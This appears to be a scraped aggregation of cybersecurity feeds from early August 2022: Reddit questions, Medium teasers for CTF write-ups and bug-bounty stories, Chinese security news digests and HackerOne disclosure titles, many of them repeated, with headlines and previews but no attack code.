    How is malware that was delivered to you via the browser able to exploit things like the OS or other software on the computer? In other words, how does malware "travel" outside of the browser to exploit other things on the computer? submitted by /u/Jaruki_Jurakami [link] [comments]
  • Open

    SecWiki News 2022-08-04 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-04 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    HackTheBox — Explosion
    Explosion is a boot2root machine on HackTheBox. It has “Very Easy” difficulty and is part of Tier 0 starting point challenges. Continue reading on Medium »
    OXDR-Red Team
    The Litmus Test of your Cybersecurity also helps to achieve a continuous Cybersecurity posture.  Redops and Cart  Vulnerability Management… Continue reading on Medium »
  • Open

    深入学习 Java 反序列化之 JNDI 运行逻辑
    深入学习 JNDI 注入的漏洞原理以及背后逻辑。
    区块链行业遭供应链攻击,上万加密钱包被“抄底”损失上亿美元
    据科技媒体TechCrunch报道,若干名未知攻击者“抄底”了上万个加密钱包,钱包内有价值上亿美元的代币。
    FreeBuf早报 | 澳大利亚监管机构调查 TikTok;GitLab 删除免费账户中的休眠项目
    澳大利亚隐私监管机构 表态,正在遵循监管行动政策,核查一份报告中指出的 TikTok 数据隐私问题。
    FreeBuf早报 | 澳大利亚隐私监管机构调查 TikTok;GitLab 计划删除免费账户中的休眠项目
    澳大利亚隐私监管机构 表态,正在遵循监管行动政策,核查一份报告中指出的 TikTok 数据隐私问题。
    CVE-2022-26138 Confluence Server硬编码漏洞分析
    Atlassian发布7月的安全更新,涉及到Confluence Server的多个漏洞,其中CVE-2022-26138为一个硬编码漏洞。
    GitHub 3.5万个代码库被黑?谣言,只是被恶意复制
    虽然“GitHub 3.5万个代码库被攻击”是一个乌龙事件,但是有软件工程师发现,大约有数千个GitHub代码库正在被恶意复制。
    Atomic wallet遭山寨,假网站散播恶意软件
    知名去中心化钱包和加密货币交换门户网站Atomic wallet近期被假冒。
    针对微软企业电子邮件服务,大规模网络钓鱼攻击来袭
    来自ThreatLabz的安全研究人员发现了一批大规模的网络钓鱼活动。
    思科修复了VPN路由器中关键远程代码执行漏洞
    目前,思科已经发布了软件更新来解决这两个漏洞。
    微软推出新服务,扩大企业对其威胁情报库的访问权限
    微软已在本周推出两项新服务,让企业安全运营中心 (SOC) 更广泛地访问其每天收集的大量威胁情报。
    研发招聘实战:2个月招20人的Linux和C语言团队
    有一年初,急需扩充后台Linux C\C++研发团队,需在2个月内招聘到20人。在薪资不属于一流的情况下如何保证质量?
  • Open

    Comics, underground, European and mainstream
    https://booksdl.org/comics0/ submitted by /u/Forward_Hold5696 [link] [comments]
  • Open

    依靠 Windows Defender | LockBit 勒索软件通过 Microsoft 安全工具侧面加载 Cobalt Strike
    作者: Julio Dantas, James Haughom, Julien Reisdorffer 译者:知道创宇404实验室翻译组 原文链接:https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-s...
  • Open

    依靠 Windows Defender | LockBit 勒索软件通过 Microsoft 安全工具侧面加载 Cobalt Strike
    作者: Julio Dantas, James Haughom, Julien Reisdorffer 译者:知道创宇404实验室翻译组 原文链接:https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-s...
  • Open

    Need Help. Question about IP/Location
    I am not sure if this is the correct sub, if not, maybe some one can help direct me to the correct one. Basically some of my personal information was stolen and posted online. I used a fake tracking link to capture the IP and other user information of the person that was posting my information online. My main question is, is there any way that the IP could track back to a different state then where the person is actually located? Like if they bought their phone in one state and then moved, could it possibly still show the old state? submitted by /u/HumanUnidentified [link] [comments]

  • Open

    geopipe: filter by server location inside your pipe chain
    submitted by /u/lukahacksstuff [link] [comments]
    The Consequences of Inadequate Identity Management in your GitHub Organization
    submitted by /u/Hefty_Knowledge_7449 [link] [comments]
    Hijacking email with Cloudflare Email Routing
    submitted by /u/jwizq [link] [comments]
    How to detect Brute Ratel C2 (beacons & server deployments)
    submitted by /u/gid0rah [link] [comments]
    EMBA Firmware analyzer version 1.1.0 aka Las Vegas Edt. is out now - a lot of new features including system emulation environment, status bar and Ubuntu support
    submitted by /u/_m-1-k-3_ [link] [comments]
  • Open

    Programming language(s) question
    Hi all, As you guys know I am going into digital forensics (specifically eDiscovery). My question for the day is, what programming language(s) do you guys suggest that I learn? Thank You. submitted by /u/swatteam23 [link] [comments]
    TCU Live: 2022AUG01 (latest release)
    The latest version of "TCU Live" (2022AUG01) has been released. It's running the latest Debian sid packages, Linux 5.18 kernel, and third party packages such as the Tor Browser, checkra1n, volatility, guestmount, git, etc. See the README in the link for more information: https://drive.google.com/drive/folders/0B8zx3qPcj9rJVjJrcnB4aXl1VG8?resourcekey=0-gjI_o4MHtiCvsjet9TCygw&usp=sharing It's built to be fairly lean and extensible and is great for in-house forensics, OSINT, field work, or if you just need to quickly spin up a Linux box. If you are looking for something that'll boot on almost all x86-64 (AMD64) hardware give it a shot and DM me if you have any comments or issues. submitted by /u/atdt0 [link] [comments]
  • Open

    ISP Stale Record Assignments
    A very large ISP had previously associated a number of their IP addresses to our company. What I mean by this is that a WHOIS/ARIN lookup for the IP has our company name referenced in it. These IP addresses are no longer in use by our company as confirmed by the ISP. The ISP is blaming DNS and telling us that it could take years for our company name to be disassociated with the IP. Why do I care? The IP addresses are negatively impacting our public footprint score utilized by regulatory agencies. Who can disassociate our company name from these IP addresses? Can't the owner of the IPs make this change since they own the IP addresses? What do I need to tell them to do? submitted by /u/mtx4gk [link] [comments]
    AlienVault Alarms - Rundll32
    Hi, I need some assistance with Alienvault OTX alarms that I've received recently. Commands are being ran on user's machines with their usernames (wouldn't this be "ran" as something else if it was an automated process?).They all have to do with:C:\Windows\System32\rundll32.exeC:\Windows\System32\svchost.exe ​ I will comment and condense the alarms down. The users whose machines it is occurring on are not computer fluent people and don't know what a command line is. I also can't find any info for the switches of the command line ( -k, -s, ). I'm having trouble figuring out if these are false positives. ​ NOTE: MD-5 hashes confirm as Microsoft on Virustotal submitted by /u/compguyguy [link] [comments]
    Bug bounty programs for Linux Kernel bugs and exploits
    Just curious what are the places willing to pay for Linux Kernel bugs and LPE exploits outside Google's kctf, ZDI's pwn2own, and zerodium? submitted by /u/AggravatingTell547 [link] [comments]
    How to exclude specific IP addresses from being monitored on Security Onion?
    Hello, In the global pillar on my manager node (/opt/so/saltstack/local/pillar/global.sls), I already specified my BPF to exclude the monitoring of whitelisted IP addresses as follows: nids: bpf: - not host 192.168.1.2 && - not host 192.168.1.3 && - not host 192.168.1.4 However, the alerts still triggered from the above IP addresses. I think that the AND operators should be replaced by OR? Any advice would be highly appreciated. Thank you. submitted by /u/sanba06c [link] [comments]
  • Open

    Flight of the Bumblebee: Email Lures and File Sharing Services Lead to Malware
    We provide a case study of how the criminal group Projector Libra uses legitimate file sharing services to distribute Bumblebee malware. The post Flight of the Bumblebee: Email Lures and File Sharing Services Lead to Malware appeared first on Unit 42.
  • Open

    War in Ukraine / August 2
    Day 161: HIMARS in action — the Russian Federation failed to destroy any of the systems delivered to Ukraine Continue reading on Medium »
  • Open

    [Bugbounty]Blind XSS via header injection to log poisoning
    Olá, espero que você esteja bem e caçando! Continue reading on Medium »
    Subdomain Takeover Tool
    dnsReaper — subdomain takeover tool for attackers, bug bounty hunters and the blue team! Continue reading on Medium »
    You need these certifications *RIGHT NOW*
    Hello guys, I’m Abhishek, today I'm with a new topic. Yes, you heard it right that You need these certifications in 2022 right now. Every… Continue reading on Medium »
    Wanna start your Journey in Web3 Cybersecurity or Bug Bounties?
    Here’s the list of Websites to look upon. Continue reading on Medium »
    How to get started into Bug Bounty?
    COMPLETE BEGINEER’S GUIDE IN 7 STEPS… Continue reading on Medium »
    Elasticsearch A Easy Win For Bug Bounty Hunters || How To Find and Report
    Assalamu Alaikum peace be upon you Continue reading on Medium »
    5 must-have books for bug hunters (Part 1)
    Hello guys, I’m back with another exciting topic. We all need guidance in bug hunting, through our mentors, professional bug hunters, and… Continue reading on Medium »
    When an IDOR becomes EVIL > Total Data Leak​
    Hi fellow hackers and friends, This is Aravind here with another awesome article on how an IDOR bug helped me to access all user data of a… Continue reading on Medium »
    Rate Limiting Bypass
    Hello folks, Continue reading on Medium »
    Open Redirect and information gathering before find that vulnerability
    In this tutorial, Im just wanna talk about open redirect vulnerability and explain how hacker do information gathering to find that… Continue reading on Medium »
  • Open

    [Bugbounty]Blind XSS via header injection to log poisoning
    Olá, espero que você esteja bem e caçando! Continue reading on Medium »
  • Open

    Subdomain Takeover Tool
    dnsReaper — subdomain takeover tool for attackers, bug bounty hunters and the blue team! Continue reading on Medium »
    Attacktive Directory
    ACTIVE DIRECTORY ROOM FROM TRY HACK ME Continue reading on System Weakness »
    Attacktive Directory
    ACTIVE DIRECTORY ROOM FROM TRY HACK ME Continue reading on Medium »
    HackTheBox — Redeemer
    Redeemer is a boot2root machine on HackTheBox. It has “Very Easy” difficulty and is part of Tier 0 starting point challenges. Continue reading on Medium »
    How To Detect Remote Desktop Protocol tunneling over SSH
    During some testing on my Windows VPS, I was checking out the OpenSSH server feature in Windows. This reminded me about the times our Red… Continue reading on Medium »
    SOCFortress Attack Simulator
    Using Caldera to test your EDR Agent Continue reading on Medium »
  • Open

    SecWiki News 2022-08-03 Review
    2022 上半年区块链安全及反洗钱分析报告 by ourren 从0-1搭建企业级数据治理体系 by ourren 国际网络攻击溯源机制的必要性和可行性探析 by ourren 云计算安全的新阶段:云上风险发现与治理 by ourren 浅析Vmess流量与强网杯2022谍影重重 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-03 Review
    2022 上半年区块链安全及反洗钱分析报告 by ourren 从0-1搭建企业级数据治理体系 by ourren 国际网络攻击溯源机制的必要性和可行性探析 by ourren 云计算安全的新阶段:云上风险发现与治理 by ourren 浅析Vmess流量与强网杯2022谍影重重 by ourren 更多最新文章,请访问SecWiki
  • Open

    XSS in redditmedia.com can compromise data of reddit.com
    Reddit disclosed a bug submitted by keer0k: https://hackerone.com/reports/862882
  • Open

    Cyber Security Detection Frameworks
    No content preview
    Abusing URL Shortners for fun and profit
    Hello Security Researchers Continue reading on InfoSec Write-ups »
    Multiple bugs in one program leads to 1500€
    No content preview
    IW Weekly #14: $1M bounty, bug bounty tips, upcoming CTF events, API attacks, bypassing .NET,
    No content preview
  • Open

    Cyber Security Detection Frameworks
    No content preview
    Abusing URL Shortners for fun and profit
    Hello Security Researchers Continue reading on InfoSec Write-ups »
    Multiple bugs in one program leads to 1500€
    No content preview
    IW Weekly #14: $1M bounty, bug bounty tips, upcoming CTF events, API attacks, bypassing .NET,
    No content preview
  • Open

    Cyber Security Detection Frameworks
    No content preview
    Abusing URL Shortners for fun and profit
    Hello Security Researchers Continue reading on InfoSec Write-ups »
    Multiple bugs in one program leads to 1500€
    No content preview
    IW Weekly #14: $1M bounty, bug bounty tips, upcoming CTF events, API attacks, bypassing .NET,
    No content preview
  • Open

    FreeBuf早报 | 德半导体制造商遭勒索软件攻击;微软宣布新的外部攻击面审计工具
    德国电力电子制造商赛米控披露,它遭到勒索软件攻击,甚至加密了公司的网络。
    恶意软件是如何伪装的,这份报告给出了答案
    恶意软件设计和部署的关键之处,在于将自己伪装成合法的APP,欺骗用户用户下载和运行恶意文件,以此感染目标设备和系统。
    知名半导体制造商Semikron遭勒索软件攻击
    德国半导体制造商Semikron披露,该公司遭到勒索软件攻击,加密了公司的部分网络。
  • Open

    PART 3: How I Met Your Beacon - Brute Ratel - @MDSecLabs
    submitted by /u/dmchell [link] [comments]

  • Open

    Creating Processes Using System Calls
    submitted by /u/sanitybit [link] [comments]
    Using process creation properties to catch evasion techniques
    submitted by /u/sanitybit [link] [comments]
    NIST SIKE finalist for quantum safe crypto has been broken by a very efficient classical computer attack.
    submitted by /u/ScottContini [link] [comments]
    All your PTY/TTY belongs to us
    submitted by /u/Background-Degree-50 [link] [comments]
  • Open

    Vulnerability management policies considered harmful to shipping secure software
    Article URL: https://haydock.substack.com/p/security-release-criteria Comments URL: https://news.ycombinator.com/item?id=32324806 Points: 3 # Comments: 0
    Hacker Probably Targeting Auth Option Update Vulnerability in Make's WP Plugin
    Article URL: https://www.pluginvulnerabilities.com/2022/08/02/hacker-probably-targeting-this-authenticated-option-update-vulnerability-in-makes-wordpress-plugin/ Comments URL: https://news.ycombinator.com/item?id=32322219 Points: 1 # Comments: 0
    Rsync client-side arbitrary file write vulnerability
    Article URL: https://www.openwall.com/lists/oss-security/2022/08/02/1 Comments URL: https://news.ycombinator.com/item?id=32318155 Points: 128 # Comments: 36
  • Open

    Web Cache Poisoning Via uma Entrada sem Chave
    Olá sou o SNISS e hoje vou falar sobre uma vulnerabilidade muito encontrada recentemente chamada de Envenenamento de web Cache Continue reading on Medium »
    Monthly Update: July 2022
    Dear community. Continue reading on Medium »
    Stored XSS to Account Takeover : Going beyond document.cookie
    Stealing Session Information From IndexedDB Continue reading on Medium »
    How I cleared(hacked) all my traffic cases with just ₹100- BugBounty [BangaloreTrafficPolice]
    Note:- It's just a bug report to the Paytm and BangaloreTrafficPolice, KarnatakaOne websites, with 5-star severity, hope they fix nothing… Continue reading on Medium »
    Why Every Organization Should have a Bug Bounty Program
    Introduction Continue reading on Medium »
    Equipe Moonbeam lança patch de segurança urgente para bug de truncamento de números inteiros
    Na segunda-feira, 27 de junho de 2022, Moonriver e Moonbeam receberam uma atualização urgente por meio do runtime 1606 para resolver um… Continue reading on Medium »
    Multiple bugs in one program leads to 1500€
    Hi, today I‘m going to talk about three basic vulnerabilities that I discovered in the same program and were rewarded with 1500€. Continue reading on InfoSec Write-ups »
    How I earned 500$ by uploading a file: write-up of one of my first bug bounty
    This is the write-up of one of the first vulnerabilities that I found 3 years ago. It’s a little late, but better late than never, right? Continue reading on Medium »
    KLEX FINANCE TESTNET QUICK GUIDE
    KLEX is an implementation of the Balancer v2 Protocol on Klaytn. Continue reading on Medium »
  • Open

    [WriteUp] OhSINT — TryHackMe
    Begginer friendly OSINT room to sharp your skills Continue reading on Medium »
    Threat Intelligence Tools — TryHackme Walkthrough
    Explore different OSINT tools used to conduct security threat assessments and investigations. Continue reading on Medium »
    War in Ukraine / August 1
    Day 160: An important moment for the Ukrainian counteroffensive Continue reading on Medium »
    Is OSINT legal or ethical?
    In the US and the UK, OSINT is legal, but security teams need to stay within a clearly defined framework, which is agreed with their… Continue reading on Medium »
  • Open

    Can kernel debugging be done between different processor architectures?
    Sorry if this sounds like a noob question. ​ When it comes to Kernel Debugging, HackSys Team's HEVD seems to be the go-to for practice. In write-ups, we see that we need to set up 2 VMs and set up baud rate, etc. Essentially, trying to replicate the hard-wired debugging across machines with Ethernet cables that was performed before VMs came along. The baud rate is matched between windbg running on both VMs and a Pipe is set up between both VMs. ​ Can this be done between different processor architectures? Ex: I have Win10 VM on a x86_64 arch machine (Debuggee) and another Win10 VM on MacBook Pro (Debugger). Since MacBook uses ARM arch, the debugger will obviously show ARM instructions (if I were to debug an application that's already on MacBook). Now, is there a way I can debug the x86_64 programs on Debuggee VM from my ARM VM? ​ If I'm not making sense, let me know. I'm pretty new to this and I'm trying to learn. submitted by /u/ScrotumHair [link] [comments]
  • Open

    DFIR career trajectory and goals - what would you do differently if you could go back in time?
    I’m new to the DFIR field, and I’m wondering what some of you, that have been in the field for years, would do if you could go back in time? What are some things to think about or consider as you go forward in your career? I’m young and inexperienced, so it’d be cool to hear about any tips, or advice you might have for a new comer in this field submitted by /u/tfulab23 [link] [comments]
  • Open

    SecWiki News 2022-08-02 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-02 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    One-click account hijack for anyone using Apple sign-in with Reddit, due to response-type switch + leaking href to XSS on www.redditmedia.com
    Reddit disclosed a bug submitted by fransrosen: https://hackerone.com/reports/1567186 - Bounty: $10000
    Found Origin IP's lead to access to gitlab
    GitLab disclosed a bug submitted by m-narayanan: https://hackerone.com/reports/1637577
  • Open

    零信任安全论坛精选议题视频上线 | CIS大会夏日版
    CIS大会夏日版,FreeBuf邀请多位业界大咖,就零信任安全进行了深入的探讨、展望,期待能够给企业和用户带来一些零信任安全方面的参考和启发。
    FreeBuf早报 | 专家称推特泄密情况很糟糕;QQ音乐开始显示用户IP属地信息
    540 万 Twitter 用户的数据在暗网上出售的消息可能会让许多人感到震惊,但这可能只是冰山一角。
    火了十几年的零信任,为啥还不能落地
    对于甲方企业来说,全面实施零信任的核心推动是什么,零信任技术未来的发展路径又是怎样的呢?
    记一次由验证码绕过到越权访问的实战记录
    运气成分90%,技术含量10%的一次记录。
    BlackCat宣布对Creos攻击事件负责
    ALPHV勒索软件团伙,又名BlackCat,宣布对Creos卢森堡公司的网络攻击事件负责。
    超3200个应用程序泄露了 Twitter API 密钥
    网络安全研究人员发现一组异常的移动应用程序,这些应用程序向民众公开了 Twitter API 密钥。
    恶意软件Raccoon升级,窃取密码效率将大大提高
    在线平台Zscaler安全专家发布了对Raccoon Stealer恶意软件新变种的分析。
    研究发现,攻击者能利用Chromium浏览器书签同步功能泄露数据
    书签可以被滥用来从企业环境中吸走大量被盗数据,或者在几乎不会被发现的情况下从中部署攻击工具和恶意有效载荷。
    窃密恶意软件Raccoon最新样本Stealer v2分析
    Raccoon 是一个信息窃密恶意软件,能够从浏览器窃取例如密码、Cookie 和自动填充数据等隐私信息。
  • Open

    Learn SQL injection in practice by hacking vulnerable application! — StackZero
    No content preview
    How to Setup BurpSuite on Linux
    No content preview
    Is CSRF really dead? Examining Stripe’s $5000 CSRF bug bounty.
    Testing for CSRF can be worth it. Continue reading on InfoSec Write-ups »
  • Open

    Learn SQL injection in practice by hacking vulnerable application! — StackZero
    No content preview
    How to Setup BurpSuite on Linux
    No content preview
    Is CSRF really dead? Examining Stripe’s $5000 CSRF bug bounty.
    Testing for CSRF can be worth it. Continue reading on InfoSec Write-ups »
  • Open

    Learn SQL injection in practice by hacking vulnerable application! — StackZero
    No content preview
    How to Setup BurpSuite on Linux
    No content preview
    Is CSRF really dead? Examining Stripe’s $5000 CSRF bug bounty.
    Testing for CSRF can be worth it. Continue reading on InfoSec Write-ups »
  • Open

    Threat analysis visualization?
    Hi peeps, I'm a SOC analyst and I was wondering if there's a software to visualize threats and incidents. I wanna create something like a timeline and such. I know I could just use visio or any other software like it but I was wondering if there's something specific for InfoSec. Thanks ;) submitted by /u/MenaHabib_ [link] [comments]
  • Open

    HackTheBox — Dancing
    Dancing is a boot2root machine on HackTheBox. It is “Very Easy” difficulty and is part of Tier 0 starting point challenges. Continue reading on Medium »
  • Open

    NimicStack: Call Stack Spoofing in Nim
    submitted by /u/DarkGrejuva [link] [comments]
  • Open

    Movies and Series
    Dunno about speeds or even its been posted before... http://88.99.99.152/ submitted by /u/DodgyguyNZL [link] [comments]

  • Open

    The Story of an Extortion Case
    I am using fake names in this story. The story is that there was this person that Zachery was talking to on a dating site. He was sadly… Continue reading on Medium »
    War in Ukraine / July 29–31
    Day 159: The food deal seems to have worked Continue reading on Medium »
    TryHackMe | WebOSINT Writeup
    TryHackMe’s WebOSINT room, finding information that no longer exists. Continue reading on Medium »
  • Open

    using wget terminal command to donwload your needed stuff/download stuff recursively
    ###########brougth to you by the guy who knows little bit about linux =what is wget? : it is a GNU computer program that retrieves content from web servers (long story short free software terminal programm that can batch download websites and what people post on this sub.) ​ =why do i need it? : sometimes its annoying to click thousands of links to download files instead of just using a free software solution that will crawl and download everything for you. ===how do i install wget? =windows : windows now has a builtin package manager(thanks linux) winget install GnuWin32.Wget or install choco package manager then do this choco install wget =linux:easy mode sudo pacman -S wget sudo dnf install wget sudo apt install wget (i think you dont need to do this since it maybe a…
    Windows comedy ISOs!
    submitted by /u/Plastic_Preparation1 [link] [comments]
    maths lecture notes
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Changing region settings in Caine 12.4
    Hello Everyone, I'm using Caine 12.4 for image acquisition because it defaults to read only and, well I like it. Everything except for the fact that the region settings are set to Italian by default. It's a small thing, but I'd, at minimum, like to see the dates in English and prefer if the region was set to Canada, and the time zone to mountain time (Whitehorse, Yukon). I can do this manually after booting, but I've found the only way to get it to work properly is to set the time zone to mountain, set the region to Canada, and delete Italian from the language list (Without deleting the language the dates still display in Italian). So I'm wondering what I would need to edit in the iso to switch the region and timezone defaults, or at the very least remove Italian from the installed languages. If anyone can help me out with this it would be greatly appreciated. submitted by /u/thenebular [link] [comments]
    Upcoming skills test
    Hello all, please delete if not allowed. I have an interview and skills test at the end of the month for an analyst position with an ICAC unit for a law enforcement agency. I am fresh out of college and although I did take some digital forensic courses, the majority of my course work had a heavy emphasis on physical evidence. The job duties of the position are primarily to conduct research and preform field previews when necessary. I have no information on what the skills test will contain. What would you recommend I try to study before taking the test? This is an entry level position, so the test will likely not contain much materiel on complex techniques. Any help would be greatly appreciated. submitted by /u/No-Librarian4750 [link] [comments]
    MemProcFS - This Changes Everything
    Good morning, It’s time for a new 13Cubed episode! This one covers a tool that I truly believe is revolutionary. Imagine being able to "mount" memory as if it were a disk image. With a single command, MemProcFS will create a virtual file system representing the processes, file handles, registry, $MFT, and more. The tool can be executed against a memory dump, or run against memory on a live system. This is a game changer for memory forensics! Episode: https://www.youtube.com/watch?v=hjWVUrf7Obk Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]
  • Open

    SSTImap - Automatic SSTI detection tool with interactive interface
    SSTImap was developed as a new SSTI detection tool based on Tplmap. The main feature of this tool and a key difference with Tplmap is the interactive mode, which enhances detection and exploitation. Also, payload for Smarty was changed to work without {{php}}{{/php}} tag, which was disabled by default in Smarty 3.0. New payloads for other template engines will be developed. https://github.com/vladko312/SSTImap submitted by /u/vladko312 [link] [comments]
  • Open

    Threat Modeling Field Guide
    submitted by /u/sanitybit [link] [comments]
    SSTImap - Automatic SSTI detection tool with interactive interface
    submitted by /u/vladko312 [link] [comments]
    A Detailed Analysis of the RedLine Stealer
    submitted by /u/CyberMasterV [link] [comments]
  • Open

    Most Common Attacks in android Apps | InsecureShop
    InsecureShop is an Android application written in Kotlin that is designed to be intentionally vulnerable. It is a great asset for… Continue reading on Medium »
    How I get Full Account Takeover via stealing action’s login form | XSS
    Today I will explain How I get Full Account Takeover via stealing the action of the login form when you have XSS on the login page. Continue reading on Medium »
    PORTSWIGGER -Command Injection Vulnerabilities LAB Çözümleri
    Selam arkadaşlar bugün Command Injection zafiyetinden bahsedip, Portswigger’da bulunan soruların çözümlerinden anlatacağım. Continue reading on Medium »
    July Monthly Update
    July went by so fast! While we have so much to share, be sure to believe that we have much more planned for the next couple months. If you… Continue reading on Medium »
    ‘PTN’ infosec monthly #2 — InfoSec Updates
    Namaste everyone, Welcome to our ‘PTN’ infosec monthly #2 and we are back with the second newsletter with PTN Anniversary special updates… Continue reading on Pentester Nepal »
    How I earned $10,000 within the last 7 months — 17y/o Edition
    you know that I mostly earn bounties in Cryptocurrencies and this leads to the answer → I mostly hunt on XXXXXXXXXXXX Continue reading on InfoSec Write-ups »
    This SIMPLE vulnerability in Shopify earned a $2500 bug bounty
    Don’t forget to check for user access rights Continue reading on InfoSec Write-ups »
    Responder Starting Point HacktheBox Walkthrough
    Responder Starting Point is a very good Challenge by HackTheBox. In this article we are going exploit it. Continue reading on Medium »
    Intigriti’s July 0722 XSS Challenge Writeup
    I. Overview Continue reading on Medium »
    VAPT — Common & Uncommon Interview Questions! Episode-1
    Here are some of the amazing interview questions that we came across and wanted to share with you. Continue reading on Medium »
  • Open

    X Stock Seems Boring but has Big Upside Potential | Utradea
    Based on the overall X stock forecast of $32.62 per share (derived from P/E & EPS, and comparable valuations), and the current price of X… Continue reading on Medium »
  • Open

    Faraday – open-source Vulnerability Management
    Article URL: https://faradaysec.com/community-v4/ Comments URL: https://news.ycombinator.com/item?id=32309146 Points: 4 # Comments: 2
  • Open

    LastPass vs Bitwarden
    Been using LastPass for years. I've been happy until my Windows 10 work laptop had an issue. The LastPass browser plugin sucks up 100% CPU. Never had this issue before. Switched to Bitwarden with no issues. Questions Has anyone else seen this issue? Which password manager would you recommend? Any issues with Bitwarden security? ​ Note: I find Bitwarden a bit clunky for day to day use. Not as slick as LastPass. Other than that I don't have a problem with it. And I kinda like the desktop app. Thanks! submitted by /u/damienhull [link] [comments]
    How do you deal with the identity crisis caused by cybersecurity?
    Well I [M27] have been interested in security since high school, and I have been working in the field for 4 years now between engineering and IR, I'm kinda good with what I do had my OSCP 3 years ago, with good background in many security fields, but now and then I feel that I want to get out of my comfort zone, I find people in the industry sharing everything on linkedin, doing podcasts that nobody listens to and posting infosec memes on their twitter where they have 7 followers, as if anybody interested. I'm not sure if it's a social issue but I rarely talk about cybersecurity on my social media or with friends and prefer sharing memes that's not related to cybersecurity, by time I feel that I have 2 personalities, i feel sad sometimes that i hate showing off and there are people who like showing off because they got a 4 letters business certificate with no technical knowledge, anybody feel the same? submitted by /u/xoutisx [link] [comments]
    Will having secret clearance take me far in Security if I don’t intend to work for the govt. long term?
    I’m more interested in working for bigger companies doing security than I am for the government- but most important to me is opening doors. If doing cybersecurity for the govt. for a few years gives me plenty of opportunities for working in other companies, I don’t mind doing it. I have two job offers and one is a threat analyst for a bigger company that’s well known in this industry, and the other is a security analyst for a government contractor and I can get a secret clearance. Haven’t decided which one will be a bigger step for my career. My end goal is to become a security engineer. One of these will be my first cybersecurity job. submitted by /u/Good-Turnip-8963 [link] [comments]
  • Open

    SecWiki News 2022-08-01 Review
    Windows下基础免杀技术 by SecIN社区 SecWiki周刊(第439期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-01 Review
    Windows下基础免杀技术 by SecIN社区 SecWiki周刊(第439期) by ourren 更多最新文章,请访问SecWiki
  • Open

    Go Fuzzing
    What is Fuzzing? Continue reading on Towards Dev »
  • Open

    Go Fuzzing
    What is Fuzzing? Continue reading on Towards Dev »
  • Open

    Insecure TLS Configuration #3530
    Hyperledger disclosed a bug submitted by bhaskar_ram: https://hackerone.com/reports/1639423
    delete the subaccount from the user id
    Showmax disclosed a bug submitted by qualwin38000: https://hackerone.com/reports/1646340 - Bounty: $700
    Insecure use of shell.openExternal() in Rocket.Chat Desktop App leading to RCE
    Rocket.Chat disclosed a bug submitted by baltpeter: https://hackerone.com/reports/924151
    Race condition on https://judge.me/people
    Judge.me disclosed a bug submitted by netboom: https://hackerone.com/reports/1566017 - Bounty: $250
  • Open

    HackTheBox — Fawn
    Fawn is a boot2root CTF on HackTheBox. It is “Very Easy” difficulty and is part of Tier 0 starting point challenges. Continue reading on Medium »
    PortSwigger Web Security Academy Lab: SQL injection vulnerability in WHERE clause allowing…
    PortSwigger Web Security Academy Lab: SQL injection Continue reading on Bilişim Hareketi »
    Kerberos
    Hey friends, it is the second article in my Active Directory Theory and Exploitation series. Today, I would like to talk about Kerberos… Continue reading on Medium »
  • Open

    IW Weekly #13: 1000s of user tokens exposed, pre-auth RCEs in Oracle, AWS Misconfigurations, IDOR…
    No content preview
    Cybersecurity Learning Path
    No content preview
    Zero-day XSS
    No content preview
    Why this EASY vulnerability resulted in a $20,000 bug bounty from GitLab
    The hidden dangers of numerical IDs Continue reading on InfoSec Write-ups »
    This SIMPLE vulnerability in Shopify earned a $2500 bug bounty
    Don’t forget to check for user access rights Continue reading on InfoSec Write-ups »
  • Open

    IW Weekly #13: 1000s of user tokens exposed, pre-auth RCEs in Oracle, AWS Misconfigurations, IDOR…
    No content preview
    Cybersecurity Learning Path
    No content preview
    Zero-day XSS
    No content preview
    Why this EASY vulnerability resulted in a $20,000 bug bounty from GitLab
    The hidden dangers of numerical IDs Continue reading on InfoSec Write-ups »
    This SIMPLE vulnerability in Shopify earned a $2500 bug bounty
    Don’t forget to check for user access rights Continue reading on InfoSec Write-ups »
  • Open

    IW Weekly #13: 1000s of user tokens exposed, pre-auth RCEs in Oracle, AWS Misconfigurations, IDOR…
    No content preview
    Cybersecurity Learning Path
    No content preview
    Zero-day XSS
    No content preview
    Why this EASY vulnerability resulted in a $20,000 bug bounty from GitLab
    The hidden dangers of numerical IDs Continue reading on InfoSec Write-ups »
    This SIMPLE vulnerability in Shopify earned a $2500 bug bounty
    Don’t forget to check for user access rights Continue reading on InfoSec Write-ups »
  • Open

    FreeBuf早报 | 上半年全国网络执法工作取得明显成效;美国众议院通过《勒索软件法案》
    2022年上半年,全国网信系统持续加大网络执法力度、规范网络执法行为,坚决依法查处各类违法违规案件,取得明显成效。
    MBDA疑似被入侵,攻击者声称获取机密
    一个名为Adrastea的攻击组织声称已经入侵了跨国导弹制造商 MBDA。
    1.1万个虚假投资网站组成的庞大网络“盯上”了欧洲
    研究人员发现了一个由 1.1万多个域名组成的巨大网络,正在向欧洲用户推广虚假投资计划。
    大华摄像头存在安全漏洞,目前已得到修复
    通过该漏洞,攻击者可获取最高权限,对受影响设备无限制访问,包括实时观看和重放摄像头视频。
    Google Play商店现17款DawDropper银行恶意软件
    这些应用包括了文档扫描仪、VPN服务、二维码阅读器和通话记录器等,共携带了 Octo、Hydra、Ermac和TeaBot四个银行木马系列。
    VeinMind:一款容器安全检测工具使用全记录
    最近在调研国内外开源的容器安全相关工具,发现了很多优秀的项目,国外的项目有trivy、anchor等,在漏洞检测这块做的很出色了;而国内的项目不多,关注非漏洞检测的工具更少,所以对一款名为问脉的开源容
  • Open

    should i delete this since the code may not actually be used in production
    submitted by /u/ParkingMobile2095 [link] [comments]
  • Open

    Virtual Images for Testing
